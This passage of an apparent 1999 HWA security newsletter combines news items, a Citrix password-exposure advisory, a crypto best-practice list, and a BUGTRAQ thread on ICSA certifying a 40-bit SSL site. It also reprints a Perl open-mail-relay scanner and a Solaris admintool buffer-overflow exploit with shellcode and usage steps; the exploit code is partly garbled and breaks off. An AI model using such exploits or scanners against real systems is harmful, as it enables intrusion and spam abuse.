said. The GAO/NSA team could not penetrate certain pockets of NASA's systems because network administrators either carefully controlled system access privileges or used patches for known operating system flaws. If expanded to the whole agency, such simple fixes could protect systems better because hackers usually will move on to systems with easily exploitable weaknesses, de Ferrari said. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 39.1 [ISN] Nasa vulnerabilities potentially deadly ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 28 May 1999 01:12:31 -0600 (MDT) From: cult hero To: InfoSec News Subject: [ISN] NASA Vulnerabilities Are Potentially Deadly http://www.aviary-mag.com/News/Leakage__Part_One/Leakage__Part_Two/leakage__part_two.html NASA Leakage -- Deadly Leakage By MIKE HUDACK 135 out of 155 NASA computer systems were found vulnerable by NSA hackers, reported the General Accounting Office. The GAO, however, didn´t say what was contained on those systems -- they simply called them "mission critical." The fact is, however, that there´s a lot more to these systems than NASA missions. "[Some NASA software has] the functionality of serving in the capacity of a munition's guidance system," said an anonymous source inside NASA. The weight of such a statement is quite obvious. "The software, however, would require a certain amount of modification and adaptation to accommodate the purpose [of nuclear weapons guidance]," the source continued. The pattern is clear: earlier this year, the world learned of espionage at Department of Energy laboratories in which neutron bomb technology was stolen. At this point, there is no evidence that guidance technology from NASA computers has been stolen. The fact remains, however, that China has a dedicated force of computer hackers who do nothing but probe US Government computers. Their missing NASA would be extraordinarily unlikely. The most damning evidence, reported by two anonymous NASA employees, states that NASA has known about security holes in its Information Technology facilities for more than a year. According to them, "Security has consistently been reduced to a reactive role in every part of the agency. [IT] which has long been identified as vulnerable is not prohibited." In fact, one went so far as to suggest that it would take a fundamental change of NASA leadership to create any true security at the Agency. Continued at: http://www.aviary-mag.com/News/Leakage__Part_One/Leakage__Part_Two/leakage__part_two.html -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 40.0 Citrux Winframe client for Linux vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 28 May 1999 12:26:59 -0700 From: David Terrell To: BUGTRAQ@netspace.org Subject: Citrix Winframe client for Linux [ presumably this holds true for the other unix clients as well, but all I have is linux to test on ] The Citrix Winframe linux client (used for accessing Winframe and Windows NT Server Terminal Edition) has a simple configuration section. Perhaps too simple.... All configuration information is stored in a directory /usr/lib/ICAClient/config which is mode 777. This in and of itself is bad news, since any user on the system can overwrite configuration data. The situation is actually much worse than that. When you start up the actual session manager (wfcmgr) you get a listbox of configured sessions. The data for this listbox is stored in the mode 777 file /usr/lib/ICAClient/config/appsrv.ini. So there's a single config file shared between all users. A sample session profile follows: [WFClient] Version=1 [ApplicationServers] broken= [broken] WinStationDriver=ICA 3.0 TransportDriver=TCP/IP DesiredColor=2 Password=0006f6c601930785 Domain=NTDOM Username=user Address=hostname Yep. Passwords are stored in some kind of hash. What that hash is doesn't really matter since you can just bring up wfcmgr and log in as that user. Terrible. I tried mailing both support@citrix.com and security@citrix.com but neither of these addresses exist. Workaround? wfcmgr supports the -icaroot parameter, but you basically need to copy all the files in for it to work. So duplicate the tree in your home directory, fix permissions, and do wfcmgr -icaroot $HOME/.ica. Alternatively, don't use it. Distressing that the company that was "bringing multiuser concurrent logons to Windows NT" makes such a little effort at understanding multiuser security.... [further editorialization left to the reader] -- David Terrell dbt@meat.net, dbt@nebcorp.com I may or may not be speaking for Nebcorp, http://wwn.nebcorp.com/~dbt/ but Nebcorp has spoken for you. @HWA 41.0 [ISN] Top 10 candidates for a "duh" list (general sec/crypto) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 28 May 1999 20:16:42 -0600 (MDT) From: cult hero To: InfoSec News Subject: [ISN] Top 10 candidates for a "duh" list (general sec/crypto) Message-ID: [Very good run-down on what isn't acceptable crypto. - Jay] Forwarded From: "Jay D. Dyson" Originally From: "Arnold G. Reinhold" Courtesy of Cryptography List. At 1:36 PM -0400 5/27/99, Kawika Daguio wrote: What I would like to know from you is whether you and others have been able to construct a "duh" list of typical, but unacceptable current practices that can easily be remediated. Here are my top 10 candidates for a "duh" list: 1. Keys that are too short: Anything less than 80 bits for symmetric ciphers (128-bits prefered), or 1024 bits for integer-based public key systems. In particular this precludes use of 56-bit DES. (112-bit 3DES is fine.) 2. Poor quality random number generation. Random quantities are needed at many places in the operation of a modern cryptographic security system. If the source of randomness is weak, the entire system can be compromised. 3. Use of short passwords or weak passphrases to protect private keys or, worse, using them to generate symmetric keys. Bad passphrase advice abounds. For example, both Netscape and Microsoft advise using short passwords to protect private keys stored by their browsers. The simple fix is to use randomly generated passphrases of sufficient length. See http://www.hayom.com/diceware.html. 4. Re-use of the same key with a stream cipher. I have seen this done many times with RC4. Even Microsoft appears to have gotten this wrong with their VPN (I do not know if it has been fixed). There are simple techniques to avoid this problem but they are often ignored. See http://ciphersaber.gurus.com for one method. The potential for slipping up in stream cipher implimentation makes a strong case for using modern block ciphers wherever possible. 5. Using systems based on encryption techniques that have not been publically disclosed and reviewed. There are more than enough ciphers and public key systems out there that have undergone public scrutiny. Many of the best are now in the public domain: 3DES, Blowfish, Skipjack, Arcfour, D-H, DSA. Others, e.g. RSA, IDEA can be licensed. 6. Ignoring physical security requirements for high value keys. In particular, no secret key is safe if it is used on a personal computer to which someone who is not trusted can gain physical access. 7. Lack of thorough configuration management for cryptographic software. The best software in the world won't protect you if you cannot guarantee that the version you approved is the version being executed. 8. Poor human interface design. Cryptographic systems that are too hard to use will be ignored, sabotaged or bypassed. Training helps, but cannot overcome a bad design. 9. Failure to motivate key employees. Action or inaction, deliberate of inadvertent, by trusted individuals can render any security system worse than worthless. David Kahn once commented that no nation's communications are safe as long as their code clerks are at the bottom of the pay scale. 10. Listening to salesmen. Any company that is selling cryptographic products has a good story for why the holes in their product really do not matter. Make sure the system you deploy is reviewed by independent experts. Arnold Reinhold -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 42.0 Seeing invisible fields and avoiding them... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Twstdpair (Source: MSNBC) See invisible fields - and avoid them The Micro Alert Alarm for detecting radio/microwaves May 28 - Earlier this week, a news story I read troubled me greatly. It told about a European study that linked cellular phone use to an increased incidence of brain tumors. For me, and millions of other cell phone junkies, this is a very scary thought. If the study is true, I could stop using my phones to minimize risks, or find out just how much "pollution" my devices are creating. THAT'S WHERE THE PEOPLE from AlphaLab Inc. come in. Someone there read a column I did on a cell phone antenna add-on that claimed to take the signal and move it away from your head. AlphaLab's David told me the company made a tiny device that could detect what your phone was really doing. I jumped at the chance to play with one. The Micro Alert Alarm is just what it says it is. It's a matchbox-sized device(2.25 inches by 1.6 inches by 0.75inches) that will (and I quote) "find what's emitting radio or microwaves,whether in hidden locations or in plainsight." The alarm puts forth a loud (annoying) beep when radio waves stronger than the level you select are present. If you move closer to the source of the RF-emitting device, the beeps will ultimately become a solid tone (more annoying). As you move away from the source, the beeping will stop altogether (thankfully). The alarm runs on a tiny battery that lasts three years or so. At its highest sensitivity, it should detect a typical cellular phone tower a half-mile away. Or an analog cellular phone 40 feet away. Or a digital phone at 20 feet. Or a microwave oven that's in use 10 to 50 feet away. To send the Micro Alert Alarm into nearly constant fits, unscrew the back and open one side. The sensitivity goes off the chart. In that mode, you can see if someone has bugged a room (anong other things). The price for this little marvel? $81.50, plus shipping and handling. Does it work? You bet. Actually, sometimes it works too well. The most important part of working this device is setting it to your location. It can be very sensitive. I really couldn't test it at MSNBC. Way too many TV monitors, computer monitors and all sorts of broadcasting stuff around. And I couldn't really test it at home in Lower Manhattan. An old friend, Joe Sand, while helping me install an antenna on my roof, told me I lived so close to the broadcast antennas on the World Trade Center, that if someone made sunglasses that detected radio waves, it would look as if I lived inside a tornado. He was right. The alarm was nearly impossible to adjust at the "normal" setting. And it never stopped beeping when set on "high" sensitivity. I did have better luck out at the Eastern Long Island test center. There I was able to adjust everything to my liking. I found that the Micro Alert Alarm didn't like microwave ovens or TV sets or computer monitors - all from a few feet away. Cellular phones (one-third-watt output) set off the beeping from about three to five feet away and my Blackberry beeper (2 watts of transmitting power) did the same from about one to two feet away. Not what AlphaLab claims, but who knows if I ever really maximized all the settings. Is it worth it? That depends. If you're the paranoid type, buy one today. I couldn't reference just how scientifically accurate it is, but under favorable conditions it did detect those invisible radio waves that could be dangerous to our health. Might turn out to be a good gift for someone with a pacemaker. On the other hand, a Micro Alert Alarm is said to find surveillance "bugs," detect police radar, leaky microwave ovens, fluorescent lighting, electric typewriters and copy machines! Finally, you can take AlphaLab's advice and switch on your Micro Alert Alarm and put it in your pocket when you go out. If someone switches on a cell phone and sets off your alarm, you can kindly ask them to move away and stop polluting your personal space. Cool! @HWA 43.0 RelayCheck v1.0 scan for smtp servers that will relay mail. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml #!/usr/bin/perl ############################################## # # # RelayCheck v1.0 # # Written By: Epicurus (epicurus@wilter.com) # # # # Purpose: To scan a list of SMTP servers to # # find servers that will relay e-mail. There # # are many reasons why one might need such a # # list of SMTP servers. # # # # Usage: # # Create a list of hosts which you want to # # scan. One host per line. Then run this # # script. # # # ############################################## use Socket; print "RelayCheck v1.0\n"; print "Written By: Epicurus (epicurus\@wilter.com)\n\n"; print "Host List: "; chomp($host_list=); print "HELO Domain: "; chomp($helo_domain=); print "Attempt From: "; chomp($from=); print "Attempt To: "; chomp($to=); print "Log Session?(y/n)"; $yn=; if($yn =~ /y/i) { $log = 1; $logfile="relay.log"; print "Log File [$logfile]: "; $file=; chop($file) if $file =~ /\n$/; if($file ne "") { $logfile=$file; } open(LOG,">>$logfile") || die("Unable to write to $logfile!"); print LOG "RelayCheck Scan:\n\n"; } ############################################## $helo_string = "HELO $helo_domain\r\n"; $mail_from = "MAIL FROM: <$from>\r\n"; $rcpt_to = "RCPT TO: <$to>\r\n"; $port = 25; $found=0; $i=0; open(HOSTS,"$host_list") || die $!; while() { chop($_) if $_ =~ /\n$/; $remote=$_; $print_remote = $remote; $print_remote .= "." while(length($print_remote) < 38); $print_remote .= ": "; print "$print_remote"; print LOG "$print_remote" if($log==1); &send_mail; $i++; } close(HOSTS); print "\nFinished Scanning. $found out of $i hosts will relay.\n\n"; print LOG "\nFinished Scanning. $found out of $i hosts will relay.\n\n" if($log==1); close(LOG); sub send_mail { if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); } die("No port specified.") unless $port; $iaddr = inet_aton($remote) || die("Failed to find host: $remote"); $paddr = sockaddr_in($port, $iaddr); $proto = getprotobyname('tcp'); socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!"); connect(SOCK, $paddr) || die("Unable to connect: $!"); $smtp=; if($smtp =~ /^220 /) { send(SOCK,$helo_string,0); } $smtp=; if($smtp =~ /^250 /) { send(SOCK,$mail_from,0); } $smtp=; if($smtp =~ /^250 /) { send(SOCK,$rcpt_to,0); } $smtp=; if($smtp =~ /^250 /) { $found++; print "relaying allowed\n"; print LOG "relaying allowed\n" if($log==1); } else { print "no relaying\n"; print LOG "no relaying\n" if($log==1); } send(SOCK,"QUIT\r\n",0); close(SOCK); } @HWA 44.0 Admintool exploit for Solaris (Updated) by Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml /*============================================================================= admintool Overflow Exploits( Solaris2.6 and 7 for Sparc Edition) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN (unewn4th@usa.net) [usage] % setenv DISPLAY=yourdisplay:0.0 % gcc ex_admintool.c (This example program) % a.out ( [Browse] -> [Software] -> [Edit] -> [Add] -> [Harddisk] -> Directory: /tmp -> [Ok] ) # In /tmp/EXP directory, the temp files are made, please remove it. ============================================================================= */ #include #include #define ADJUST1 2 #define ADJUST2 1 #define BUFSIZE1 1000 #define BUFSIZE2 800 #define OFFSET 3600 #define OFFSET2 400 #define PKGDIR "mkdir /tmp/EXP" #define PKGINFO "/tmp/EXP/pkginfo" #define PKGMAP "/tmp/EXP/pkgmap" #define NOP 0xa61cc013 char exploit_code[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68" "\x90\x0b\x80\x0e\x92\x03\xa0\x0c" "\x94\x10\x20\x10\x94\x22\xa0\x10" "\x9c\x03\xa0\x14" "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" "\x91\xd0\x20\x08" ; unsigned long get_sp(void) { __asm__("mov %sp,%i0 \n"); } unsigned long ret_adr; static char x[500000]; FILE *fp; int i,vofs=0; struct utsname name; main() { uname(&name); if (strcmp(name.release,"5.7")==0) vofs=-904; system(PKGDIR); putenv("LANG="); if ((fp=fopen(PKGMAP,"wb"))==NULL){ printf("Can not write '%s'\n",PKGMAP); exit(1); } fclose(fp); if ((fp=fopen(PKGINFO,"wb"))==NULL){ printf("Can not write '%s'\n",PKGINFO); exit(1); } fprintf(fp,"PKG="); ret_adr=get_sp()-OFFSET+vofs; while ((ret_adr & 0xff000000) == 0 || (ret_adr & 0x00ff0000) == 0 || (ret_adr & 0x0000ff00) == 0 || (ret_adr & 0x000000ff) == 0) ret_adr += 4; printf("Jumping address = %lx\n",ret_adr); memset(x,'a',4); for (i = ADJUST1; i < 1000; i+=4){ x[i+3]=ret_adr & 0xff; x[i+2]=(ret_adr >>8 ) &0xff; x[i+1]=(ret_adr >> 16 ) &0xff; x[i+0]=(ret_adr >> 24 ) &0xff; } x[BUFSIZE1]=0; fputs(x,fp); fprintf(fp,"\n"); fprintf(fp,"NAME="); memset(x,'a',4); for (i = ADJUST2; i < BUFSIZE2; i+=4){ x[i+3]=NOP & 0xff; x[i+2]=(NOP >> 8 ) &0xff; x[i+1]=(NOP >> 16 ) &0xff; x[i+0]=(NOP >> 24 ) &0xff; } for (i=0; i To: BUGTRAQ@netspace.org Subject: ICSA certifies weak crypto as secure I am becoming concerned about the apparent lack of professional competence within even well-known segments of the security community. I hope the incident I discovered is an isolated one, but even a single such incident is disquieting. There is a site that offers credit reports to consumers called ConsumerInfo.com. https://www.consumerinfo.com The site owner seems to have tried to do everything right. They joined TrustE. They had their site certified by ICSA. They clearly have given security a serious thought. But the company and all its customers were severely let down by ICSA, since the highly confidential information submitted by the user to the site is insufficiently "secured" by 40bit TLS. And it is not as if using 128 bit would have been a challenge. The site uses IIS and is located in the US. (Not that deploying 40 bit crypto would be acceptable even outside the US). I find it frightening to think that somebody calling themselves a security professional might even consider certifying a site using 40bit SSL to protect crucial customer information. Especially a site in the financial sector. Certifying obfuscation as security is an unacceptable level of performance by any computer security professional. I would like to be able to blame simple ignorance of crypto for this deed, which alone would be bad enough coming from a security "professional", but I am afraid that's not possible since it is inconceivable that the certifying ICSA member was unaware that 128 bit TLS/SSL is industry standard. Instead, we must assume that for reasons unknown, but ultimately irrelevant, a certification was issued for technology the issuer knew to not afford the customer security or simply didn't bother to check the crypto strength. Either way this condemns ICSA (a member of the Gartner Group), and reflects very badly on our industry as a whole. --Lucky Green PGP 5.x encrypted email preferred ---------------------------------------------------------------------------- From: Peter Gutmann To: BUGTRAQ@netspace.org Subject: Re: ICSA certifies weak crypto as secure "Lucky Green" writes: >I am becoming concerned about the apparent lack of professional competence >within even well-known segments of the security community. I hope the >incident I discovered is an isolated one, but even a single such incident is >disquieting. [...] >I find it frightening to think that somebody calling themselves a security >professional might even consider certifying a site using 40bit SSL to >protect crucial customer information. Especially a site in the financial >sector. Certifying obfuscation as security is an unacceptable level of >performance by any computer security professional. I think it's pretty common, in 1997 I heard of Ernst and Young in NZ certifying 40-bit SSL as being secure for banking use. I mentioned this in a posting to sci.crypt titled "Crypto for beancounters" and got several responses from people saying they'd had similar experiences (not necessarily with E&Y, but with Big 6 firms who did security audits). The summary of the responses was: -- Snip -- [...] - Getting a security system accepted is more likely if it's been reviewed by the company auditors, even if the people involved don't have much experience with the technology. - Even if the auditors don't have much crypto experience, they're generally very good at finding things like procedural flaws. Most real systems fail because they're not used properly, not because of technical attacks. Accountants/auditing firms are very good at finding problems like this. - Some firms may have experience in auditing crypto, but more importantly they should be able to call in outside experts to check the crypto. Requiring that the audit report include details of how the crypto was evaluated and (if external experts were used) by who would be a good idea. In summary use the auditing firm to cover security procedures, but (unless they have expertise in the area) leave assessment of the crypto software to known experts in the field and/or insist in seeing details of how the crypto was assessed. -- Snip -- It's really just an issue of being able to prove due diligence - all you need is the right people to check the "Uses encryption" box and you're OK. Whether the encryption is any good or not is largely irrelevant, at least for the purposes of the exercise, which is to pass the audit. Peter. ---------------------------------------------------------------------------- Date: Thu, 27 May 1999 16:14:17 -0400 From: Jon McCown To: BUGTRAQ@netspace.org Subject: ICSA - Certified Sites and Criteria Issues -----BEGIN PGP SIGNED MESSAGE----- While I am constrained by NDAs from discussing the specific issues of any particular ICSA customer's security issues or policy, I will respond "in general" to Lucky Green's posting regarding the use of 40-bit cryptography as part of an ICSA certified configuration. Participants in our site certification program (TruSecure) are required to meet in excess 200 criteria elements; covering such issues as physical security, business continuity, personnel management, network architecture, patches and updates, privacy, and sensitive information handling. Nearly all of the criteria elements are driven by the customer's security and operational policy-- which is derived from their business objectives and risk management approach. The 'specific' criteria elements which govern the use of cryptography in the context of the customer site are (verbatim): HUF0007: The handling procedures, security measures, and classifications for sensitive information are documented in a Sensitive Data Policy. The procedures identified in the policy are in place. HUF0014: The site's Internet Security Policy, as documented on form TS012.01 - Security Posture and Policy, has been implemented HUF0027: If client data is gathered by the target, then the site must publish online its site visitor privacy, and user data security policies. SVC0034: Sensitive Information, as identified in HUF0007 is encrypted and uses protocols which are acceptable to both the host and user. [in this context the "host" is the site operator and the "user" is their client base] In this context _is_ possible for a customer to mandate (via their own policy) use of whatever levels of cryptography they view as being appropriate to their business model and customer requirements. For example, if a customer policy specifies 128-bit TLS, client-certificates, and token-based auth-- they will be validated at that level. And if validating the server's identity to the end-user, or no-hassle compatibility with zillions of consumers' bargain-club-PC 40-bit browsers is a goal-- a different policy might well result. Yes, we (ICSA Labs) do agree that 40-bit/8-second, and even 56-bit encryption have become low-hanging-fruit on the confidentiality tree. The Gilmore/EFF demonstrations and recent IETF SAG discussions have put that writing on the wall. Do we need to add an "appropriate crypto strength" element to the TruSecure criteria? Yes I guess we do. - - Jon McCown, ICSA Labs -----BEGIN PGP SIGNATURE----- Version: PGP 5.5.5 iQCVAwUBN02nmaN04bWY62GPAQEwwgP/aJLdrxCNRkRJAtp9mdbVb2+tZttwiLbI 77gbVtbyrFG29iqp/qs0zIz4+ZS73+8fGqisaWgFyRiaM1FJhLXyjQbRVrUkAqJq F/5cTmuTF9DOwsada+l8iq9ZO+VNk2AAo/TJnqaW3Y0/cNn2+XmA3edSgAEydO5D Ox4VuVRLLCo= =Mkwn -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- Date: Thu, 27 May 1999 16:06:17 -0700 From: Lucky Green To: BUGTRAQ@netspace.org Subject: Re: ICSA - Certified Sites and Criteria Issues > From: Jon McCown [mailto:jmccown@icsa.net] > In this context _is_ possible for a customer to mandate (via their > own policy) use of whatever levels of cryptography they view as being > appropriate to their business model and customer requirements. For > example, if a customer policy specifies 128-bit TLS, > client-certificates, and token-based auth-- they will be validated at > that level. And if validating the server's identity to the end-user, > or no-hassle compatibility with zillions of consumers' bargain-club-PC > 40-bit browsers is a goal-- a different policy might well result. Now I am really getting worried. From your post it is clear that you, a representative of ICSA, are unaware that by enabling 128 bit TLS/SSL on a server you by no means prevent users limited to 40 bit crypto from accessing it. Sure, a server can be specifically configured to not allow access by 40 bit browsers, but the overwhelming majority of 128 bit capable websites support both 128 and 40 bit crypto and will automatically use the highest strength supported by the browser. No incompatibility issues are introduced by enabling full-strength crypto. The site certified by ICSA did not support 128 bit crypto even to browsers that support it. Which is, IMHO, unacceptable for a site that had their security checked by an audit. --Lucky ---------------------------------------------------------------------------- Date: Thu, 27 May 1999 19:23:19 -0400 From: Russ To: BUGTRAQ@netspace.org Subject: Re: ICSA - Certified Sites and Criteria Issues If ICSA is "constrained by NDAs from discussing the specific issues of any particular ICSA customer's security issues or policy" and "Nearly all of the criteria elements are driven by the customer's security and operational policy-- which is derived from their business objectives and risk management approach." and you say "Do we need to add an "appropriate crypto strength" element to the TruSecure criteria? Yes I guess we do." then what, pray tell, should a consumer visiting https://www.consumerinfo.com/n/security.htm?htm+l glean from the fact that the page linked on their site from your ICSA icon contains the following; "ConsumerInfo.Com employs sophisticated encryption" and further states; "In addition to employing these high-security measures, ConsumerInfo.Com has undergone the rigorous certification process for the International Computer Security Association's (ICSA) Web Certification program. This process examined every aspect of our security precautions, encompassing an on-site inspection of our facility for physical security and policy plus a remote assessment of our potential vulnerabilities to web-based attacks. In addition, the ICSA's certification is a continuous process, repeated several times during the year and renewed annually, so you know ConsumerInfo.Com's security measures are state-of-the-art." However, the bottom line is that; - They are *NOT* employing "sophisticated encryption", they're employing the least sophisticated deployable. - They also say ICSA "examined every aspect of our security precautions", but in fact, you only examined those aspects defined in their policies. - They also claim that because of your certification, their customers "know ConsumerInfo.Com's security measures are state-of-the-art" when in fact their *NOT*. I will not, at this time, question the integrity of ICSA. Nor will I suggest that ConsumerInfo.Com is out and out lying. I will, however, suggest that ICSA is tacitly allowing ConsumerInfo.Com to mislead their customers via the ICSA Web Certification approval. By ICSA not being permitted, by NDA, to discuss certification they have performed, it renders, IMNSHO, the certification itself *worthless*. It would appear that ConsumerInfo.Com has been allowed to say anything they want about their work with ICSA and, by NDA, ICSA cannot rebuke it. ICSA Web Certification reports should be public, or, not trusted. Cheers, Russ - NTBugtraq Editor ---------------------------------------------------------------------------- Date: Thu, 27 May 1999 18:46:47 -0400 From: Adam Shostack To: BUGTRAQ@netspace.org Subject: Re: ICSA - Certified Sites and Criteria Issues You can ISO9001 certify the process of shooting yourself in the foot, so long as the process is documented and reliably produces the proper result. Do you require certified sites post their security policy? If not, how do I know that the policy doesn't explicitly accept the presense of phf in /cgi-bin? Would it be possible to have that in my policy and still get certified, if I have good business reasons for putting it in place? This flap may be a result of certifying compliance to policy, but the relying parties on your mark should not be expected to be able to read and understand those policies; they should be able to rely on your mark to say that the policies make sense. Incidentally, do you require sites to post these policies to which you certify compliance? I think that the high level message here (and from the TRUSTe/Microsoft crap) is that what organizations like ICSA and Truste are certifying is not what people who may be expected to rely on those marks expect is being certified. Adam On Thu, May 27, 1999 at 04:14:17PM -0400, Jon McCown wrote: | -----BEGIN PGP SIGNED MESSAGE----- | | While I am constrained by NDAs from discussing the specific issues of | any particular ICSA customer's security issues or policy, I will | respond "in general" to Lucky Green's posting regarding the use of | 40-bit cryptography as part of an ICSA certified configuration. | | Participants in our site certification program (TruSecure) are | required to meet in excess 200 criteria elements; covering such issues | as physical security, business continuity, personnel management, | network architecture, patches and updates, privacy, and sensitive | information handling. Nearly all of the criteria elements are | driven by the customer's security and operational policy-- which is | derived from their business objectives and risk management approach. | | The 'specific' criteria elements which govern the use of cryptography | in the context of the customer site are (verbatim): | | HUF0007: The handling procedures, security measures, and | classifications for sensitive information are documented in a | Sensitive Data Policy. The procedures identified in the policy are | in place. | HUF0014: The site's Internet Security Policy, as documented on form | TS012.01 - Security Posture and Policy, has been implemented | HUF0027: If client data is gathered by the target, then the site | must publish online its site visitor privacy, and user data security | policies. | SVC0034: Sensitive Information, as identified in HUF0007 is | encrypted and uses protocols which are acceptable to both the host and | user. | [in this context the "host" is the site operator and the "user" is | their client base] | | In this context _is_ possible for a customer to mandate (via their | own policy) use of whatever levels of cryptography they view as being | appropriate to their business model and customer requirements. For | example, if a customer policy specifies 128-bit TLS, | client-certificates, and token-based auth-- they will be validated at | that level. And if validating the server's identity to the end-user, | or no-hassle compatibility with zillions of consumers' bargain-club-PC | 40-bit browsers is a goal-- a different policy might well result. | | Yes, we (ICSA Labs) do agree that 40-bit/8-second, and even 56-bit | encryption have become low-hanging-fruit on the confidentiality tree. | The Gilmore/EFF demonstrations and recent IETF SAG discussions have | put that writing on the wall. Do we need to add an "appropriate | crypto strength" element to the TruSecure criteria? Yes I guess we | do. | | - - Jon McCown, ICSA Labs | | | | -----BEGIN PGP SIGNATURE----- | Version: PGP 5.5.5 | | iQCVAwUBN02nmaN04bWY62GPAQEwwgP/aJLdrxCNRkRJAtp9mdbVb2+tZttwiLbI | 77gbVtbyrFG29iqp/qs0zIz4+ZS73+8fGqisaWgFyRiaM1FJhLXyjQbRVrUkAqJq | F/5cTmuTF9DOwsada+l8iq9ZO+VNk2AAo/TJnqaW3Y0/cNn2+XmA3edSgAEydO5D | Ox4VuVRLLCo= | =Mkwn | -----END PGP SIGNATURE----- -- "It is seldom that liberty of any kind is lost all at once." -Hume ---------------------------------------------------------------------------- Date: Thu, 27 May 1999 15:44:47 -0700 From: David Schwartz To: BUGTRAQ@netspace.org Subject: Re: ICSA - Certified Sites and Criteria Issues So does ICSA certification mean simply that a company has met its own requirements? (As opposed to some set of objectively validated or ICSA-imposed requirements?) DS > Participants in our site certification program (TruSecure) are > required to meet in excess 200 criteria elements; covering such issues > as physical security, business continuity, personnel management, > network architecture, patches and updates, privacy, and sensitive > information handling. Nearly all of the criteria elements are > driven by the customer's security and operational policy-- which is > derived from their business objectives and risk management approach. [snip] > In this context _is_ possible for a customer to mandate (via their > own policy) use of whatever levels of cryptography they view as being > appropriate to their business model and customer requirements. For > example, if a customer policy specifies 128-bit TLS, > client-certificates, and token-based auth-- they will be validated at > that level. And if validating the server's identity to the end-user, > or no-hassle compatibility with zillions of consumers' bargain-club-PC > 40-bit browsers is a goal-- a different policy might well result. [snip] ---------------------------------------------------------------------------- Date: Fri, 28 May 1999 11:09:08 +0100 From: Simon Liddington To: BUGTRAQ@netspace.org Subject: Re: ICSA - Certified Sites and Criteria Issues Lucky Green writes: > Sure, a server can be specifically configured to not allow access by 40 bit > browsers, but the overwhelming majority of 128 bit capable websites support > both 128 and 40 bit crypto and will automatically use the highest strength > supported by the browser. No incompatibility issues are introduced by > enabling full-strength crypto. In my experience with Netscape and apache-SSL the lowest strength cipher (apart from no cipher at all) is used. Unless you disable the weaker ciphers in Netscape, netscape tries them first and will connect if the server allows them. Of course this doesn't invalidate your statement that there is no problem with enabling full-strength crypto, but it does mean there is also little to gain by doing so. Simon -- ----------------------------------------------------------------------- | Simon Liddington | | | E-Mail : sjl96v@ecs.soton.ac.uk | Tel (work) : +44 (0)1703 592422 | ----------------------------------------------------------------------- ---------------------------------------------------------------------------- Date: Fri, 28 May 1999 13:48:30 -0500 From: Jeremey Barrett To: BUGTRAQ@netspace.org Subject: Re: ICSA - Certified Sites and Criteria Issues On Fri, May 28, 1999 at 11:09:08AM +0100, Simon Liddington wrote: > Lucky Green writes: > > > Sure, a server can be specifically configured to not allow access by 40 bit > > browsers, but the overwhelming majority of 128 bit capable websites support > > both 128 and 40 bit crypto and will automatically use the highest strength > > supported by the browser. No incompatibility issues are introduced by > > enabling full-strength crypto. > > In my experience with Netscape and apache-SSL the lowest strength > cipher (apart from no cipher at all) is used. Unless you disable the > weaker ciphers in Netscape, netscape tries them first and will connect > if the server allows them. A client in SSL sends all its supported ciphers at once, it doesn't "try" some, then "try" others. The server chooses which cipher to use from amongst those the client supports. If you have 128-bit capable Netscape, and 128-bit capable Apache SSL, or a Netscape server, or Stronghold, or whatever, you get full strength crypto, unless there's a bug in the server. Obviously if one or the other doesn't support it, you don't. Regards, Jeremey. -- Jeremey Barrett GPG fingerprint = 7BB2 E1F1 5559 3718 CE25 565A 8455 D60B 8FE8 B38F ---------------------------------------------------------------------------- Date: Fri, 28 May 1999 16:39:03 -0400 From: David Kennedy CISSP To: BUGTRAQ@netspace.org Subject: Re: ICSA - Certified Sites and Criteria Issues -----BEGIN PGP SIGNED MESSAGE----- I'm taking it upon myself to respond for Jon who's busy trying to have a life outside the office. As he did, I'm going to try to steer clear of a specific discussion of any of our customers. We thank the open review process of the total crypto community for bringing this to our attention. We will include this discussion in our ongoing process to maintain the TruSecure criteria. I'd like to restate what I feel is the most pertinent criterion that bears on this issue: the criterion requires encryption and protocols acceptable to both the host and the client. As a practical matter, for web activity this is either 40-bit SSL or 128-bit SSL. The TruSecure customers have the flexibility to choose, and their customers, in turn, decide if this is "acceptable." Clearly, most of the readers of these lists regard 128-bit SSL as the minimum they would find acceptable. However I think those same readers would acknowledge that the majority of users on the Internet worldwide today are using a 40-bit version of the popular browsers. A business has every right to decide if 40-bit SSL is the level of security they feel is appropriate for the information they are processing. A TruSecure customer may make a business decision that 40-bit SSL is "acceptable" for the communication of data from their hosts to their clients. Once this decision is made, they may configure their systems for 40-bit only. It should be clear from Jon's previous message that, in the abstract, 128-bit SSL is preferable to 40-bit SSL. However, 40-bit SSL for all it's faults, protects data in transit from the client to the host from all but a targeted attack by an experienced, well-resourced adversary. 40-bit SSL provides superior security than the majority of meatspace exchanges of sensitive information. At 07:53 PM 5/27/99 -0400, David Schwartz wrote: > > So does ICSA certification mean simply that a company has met its own >requirements? (As opposed to some set of objectively validated or >ICSA-imposed requirements?) Certification requires compliance with our criteria. The best web page we have describing this is: http://www.trusecure.net/process.html If you want the nitty gritty details, 